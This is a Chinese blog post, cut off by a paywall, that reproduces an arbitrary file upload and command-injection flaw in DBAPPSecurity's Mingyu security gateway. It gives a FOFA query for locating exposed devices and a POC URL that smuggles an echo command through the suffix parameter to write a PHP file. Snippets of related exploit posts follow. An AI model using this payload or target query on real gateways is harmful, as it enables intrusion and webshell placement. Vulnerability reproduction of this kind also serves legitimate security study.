明御安全网关任意文件上传漏洞复现

最新推荐文章于 2024-10-18 13:18:35 发布
最新推荐文章于 2024-10-18 13:18:35 发布
阅读量438 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l1593572468/article/details/134255405
版权
漏洞复现 专栏收录该内容
39 篇文章 18 订阅 ¥9.90 ¥99.00
订阅专栏
本文介绍了安恒信息明御安全网关的任意文件上传漏洞,该漏洞可能导致直接getshell。通过FOFA语法定位到受影响系统,POC验证文件上传成功并能访问到内容。为修复此问题,建议升级到最新版本。文章强调仅为学习用途,非法使用后果自负。
摘要由CSDN通过智能技术生成

简介

安恒信息明御安全网关(NGFW) 秉持安全可视、简单有效的理念,以资产为视角的全流程防御的下一代安全防护体系,并融合传统防火墙、入侵防御系统、防病毒网关、上网行为管控、VPN网关、威胁情报等安全模块于一体的智慧化安全网关。

较低版本的系统存在任意文件上传漏洞,可导致直接getshell。

漏洞复现

FOFA语法:

title="明御安全网关"

访问页面如下:

POC:

/webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&$type=1&suffix=1%7Cecho+%22test123%22+%3E+.test.php

拼接URL尝试访问

了解本专栏 订阅专栏 解锁全文
Cheng-Ling
关注
专栏目录
订阅专栏
网神 SecGate 3600 防火墙任意文件上传漏洞复现
0xSec
08-10 3688
网神 SecGate 3600 防火墙 obj_app_upfile 接口存在任意文件上传漏洞,未经授权的攻击者通过漏洞可以上传任意文件,获取服务器权限。
漏洞复现】某厂商明御安全网关sslvpn命令执行漏洞
晚风不及你
03-02 1430
明御安全网关是杭州安恒信息技术股份有限公司研发的一款智慧化安全网关产品。这款产品秉持安全可视、简单有效的理念,以资产为视角,构建了全流程防御的下一代安全防护体系。
明御运维审计与风险控制系统漏洞复现_明御堡垒机漏洞
uiuuyy67的博客
04-12 703
为了做好运维面试路上的助攻手,特整理了上百道。
漏洞复现--安恒明御安全网关文件上传
qq_53003652的博客
10-17 504
安恒明御安全网关是一个网络安全产品,由安恒信息技术股份有限公司开发和提供。它是一个综合性的安全管理平台,用于保护企业网络免受各种网络威胁的攻击。该产品存在文件上传漏洞。如此页面便存在该漏洞。该POC已将一句话木马写入,名称为.xxx.php,路径在/webui/.xxx.php。脚本来自揽月安全团队。
【nday】HVV2023 安恒明御安全网关文件上传漏洞
伏一
06-04 212
title="明御安全网关"
安恒明御安全网关aaa_local_web_preview 任意文件上传漏洞复现
The current road is different, love needs to distinguish between right and wrong
12-18 642
安恒明御安全网关是一个网络安全产品,由安恒信息技术股份有限公司开发和提供。它是一个综合性的安全管理平台,用于保护企业网络免受各种网络威胁的攻击。该产品aaa_local_web_preview端点存在文件上传漏洞。没有人规定,一朵花一定要成长为向日葵或者玫瑰。
安恒信息明御安全网关 suffix参数任意文件上传漏洞
CommputerMac的博客
10-19 518
安恒信息明御安全网关(以下简称“NGFW”)秉持安全可视、简单有效的理念,以资产为视角,构建“事前+事中+事后”全流程防御的下一代安全防护体系,并融合传统防火墙、入侵防御系统、防病毒网关、上网行为管控、VPN网关、威胁情报等安全模块于一体的智慧化安全网关。该系统存在任意文件上传漏洞,攻击者可通过此漏洞上传木马,远程控制设备。返回 success 说明上传成功。
漏洞复现】电信网关配置管理系统-文件上传-upload
知黑而守白
05-31 228
电信网关配置管理系统是一个用于管理和配置电信网络中网关设备的软件系统。它可以帮助网络管理员实现对网关设备的远程监控、配置、升级和故障排除等功能,从而确保网络的正常运行和高效性能。电信网关配置管理系统某接口处存在任意文件上传,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
【1day】复现锐捷 NBR 路由器 存在任意文件上传漏洞
记录并分享学习安全的知识点..
08-21 992
锐捷NBR路由器是锐捷网络科技有限公司推出的一款高性能企业级路由器。NBR是"Next-Generation Broadband Router"的缩写,意为"下一代宽带路由器"。该路由器具有强大的处理能力和丰富的功能,适用于中小型企业、校园网络和数据中心等场景。锐捷 NBR 路由器 存在任意文件上传漏洞,可能导致执行恶意代码、服务器拒绝服务、数据泄露、网站篡改和横向渗透等危害。
CTFHUB技能树之HTTP协议——响应包源代码
weixin_73049307的博客
10-13 527
点击“开始”没有抓取到报文,先看看网页源代码是什么情况。居然直接给出flag了,不知道这题的意义何在。是个贪吃蛇小游戏,看不出来有什么特别的地方。
等保测评:如何进行有效的安全合规性审查
最新发布
2301_79955948的博客
10-18 498
等保测评(信息安全等级保护测评)是一项至关重要的安全合规性审查工作,旨在帮助组织保障信息系统的安全性、合规性,有效应对安全风险,提升整体安全防护水平。
常见的内网渗透思路及方法(包含示例)
xixixi7777的博客
10-11 1133
内网渗透是指在企业或组织的内部网络中进行安全测试,以发现和利用网络中的安全漏洞
以太网交换安全:MAC地址漂移与检测(实验:二层环路+网络攻击)
fanshizhiren的博客
10-15 694
MAC地址漂移是指网络中设备的MAC地址在运行过程中发生变化的现象。MAC地址是用于唯一标识网络中的设备。MAC地址漂移是指交换机上一个VLAN内有两个端口学习到同一个MAC地址,后学习到的MAC地址表项覆盖原MAC地址表项的现象。当一个MAC地址在两个端口之间频繁发生迁移时,即会产生MAC地址漂移现象:正常情况下,网络中不会在短时间内出现大量MAC地址漂移的情况。出现这种现象一般都意味着网络中存在环路,或者存在网络攻击行为。
赏金猎人 | 挖掘TP-Link 服务中的信息泄露漏洞
zkaq7777777的博客
10-15 700
作为一名专注于安全研究的人员,我经常利用空闲时间探索漏洞奖励计划的世界。尽管传统平台提供了不少有价值的机会,我也会将调查扩展到一些知名厂商的公开系统上。最近,我在一个 TP-Link 的子域上发现了一个重大安全问题,该漏洞暴露了包含明文密码的敏感用户信息。img在问题上报给 TP-Link 后,适当的安全措施已在发布前采取。以下所有信息均已适当处理,以维护保密性并遵守道德标准。
汽车开发流程管理工具赋能安全与质量
经纬恒润的官方博客
10-15 741
经纬恒润能够提供Stages的咨询及工程服务能力,同时在ALM实施、ASPICE、功能安全、预期功能安全等有着丰富的咨询经验,帮助客户共同构建一个更高的安全标准和质量水平。
安全 | AWS S3存储桶安全设计缺陷分析
2401_82664371的博客
10-18 577
默认情况下,Amazon S3 是安全的。创建后,只有资源所有者才能访问他们创建的 Amazon S3 资源。
富格林:摆脱欺诈稳定安全交易
fgl100的博客
10-15 253
现货黄金在技术面上最重要的一点便是顺势操作,亦称为右侧交易,预测一个趋势的形成,一般以破高破低延续或波浪理论去判断,单边趋势形成后,就要顺势去交易,少做逆势单,直至面临变盘或出现反转信号,方可获利了结。进入现货黄金市场后,投资者希望能从中赚取收益以及盈利的,所以在进行现货黄金交易之前,还是需要设立属于自己的盈利目标,想要尽快地去盈利,就需要从中做好市场走势的判断和了解,这个过程就需要通过技术指标来完成相应的分析,这样才能做好对交易的判断,从中来找到一个不错的时机,完成具体的交易。
【安当产品应用案例100集】021- 针对电网接入设备的控制指令安全解决方案
www.andang.cn
10-12 1004
电网接入设备控制指令安全需加密技术、防护体系、人员培训等确保稳定防攻击。电网对终端接入及控制指令有严格安全要求,包括身份认证、数据加密等。签名验签技术保障指令安全,结合USBkey+KSP系统提升整体安全性。
【网络安全】IDOR与JWT令牌破解相结合,实现编辑、查看和删除数万帐户
等风来
10-15 181
某公共漏洞奖励计划的应用程序API中存在两个关键漏洞,这些漏洞严重危及用户数据和账户安全。第一个漏洞允许通过未受保护的API端点获取未经授权的用户敏感数据,第二个漏洞则利用了弱加密的JSON Web Token(JWT)密钥,使攻击者能够冒充用户执行敏感操作。
安恒明御安全网关文件上传
09-01
根据提供的引用资料,安恒明御安全网关中存在文件上传漏洞。具体来说,该漏洞允许攻击者通过执行命令上传恶意文件到安恒明御安全网关上。由于没有给出具体的文件上传漏洞的细节,我无法提供更多的信息。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [溯源 - 记一次简单安全事件分析之溯源02](https://blog.csdn.net/weixin_43650289/article/details/113408383)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [无胁科技-TVD每日漏洞情报-2022-7-31](https://blog.csdn.net/weixin_44242297/article/details/126082214)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [2023-0Day(漏洞检测Tools)V1.6 HW-漏洞挖掘-src](https://download.csdn.net/download/qq1140037586/88244373)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cheng-Ling

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值